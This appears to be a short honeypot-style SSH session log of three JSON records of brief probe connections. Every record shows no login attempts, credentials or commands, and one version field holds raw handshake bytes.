{
"id": "00b0c62f125c",
"src_ip": "104.152.52.100",
"start_time": "2026-07-02T22:04:35.810182Z",
"end_time": "2026-07-02T22:04:35.937182Z",
"duration": "0.1",
"version": "SSH-2.0-Go",
"hassh": "e54ef3ec27fe1fea7ab64d3fa05359fd",
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "dc8139b9d67e",
"src_ip": "104.152.52.103",
"start_time": "2026-07-02T22:04:35.678626Z",
"end_time": "2026-07-02T22:04:35.684397Z",
"duration": "0.0",
"version": "\u0016\u0003\u0001\u0005\\xca\u0001\u0000\u0005\\xc6\u0003\u0003K\t\\\t\\xd2\\xfba#\\xc6\u0005X\\xc4\"\\xdeCm\u001c\\x953\\xb5\\xd8]/\\xc0[\\xa3\u0006\\x9d\u0006\\xd13\\xc4 ^\\xa8=@QP\\xa7)\\xd4\\xe1[\u0000\u0015B\f\\xa4\\xe73\\x98\b(7\\xa2\\x96\u0013\u0299\\xe4o(e\\xf8\u0000\u001a\\xc0+\\xc0/\\xc0,\\xc00\u0329\u0328\\xc0\t\\xc0\u0013\\xc0",
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}Autonomous probing activity normalized. Remote entity established connection but deferred authentication.
{
"id": "f05ffb12a4d6",
"src_ip": "192.168.0.1",
"start_time": "2026-07-02T21:58:04.623520Z",
"end_time": "2026-07-02T21:58:04.635449Z",
"duration": "0.0",
"version": null,
"hassh": null,
"attempts": [],
"success_login": false,
"success_credential": null,
"commands": [],
"detailed_commands": [],
"failed_commands": [],
"score": 0,
"tags": []
}